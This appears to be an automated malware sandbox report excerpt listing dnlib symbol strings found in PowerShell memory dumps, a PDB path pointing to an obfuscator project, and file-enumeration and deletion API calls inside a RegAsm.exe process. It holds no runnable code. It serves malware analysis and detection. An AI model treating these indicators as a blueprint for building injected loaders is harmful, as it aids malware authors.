                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\dnlib-fuscator-master win7 fix\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407877 FindFirstFileW,FindNextFileW, 8_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0044E8F9 FindFirstFileExA, 8_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_0040BB6B
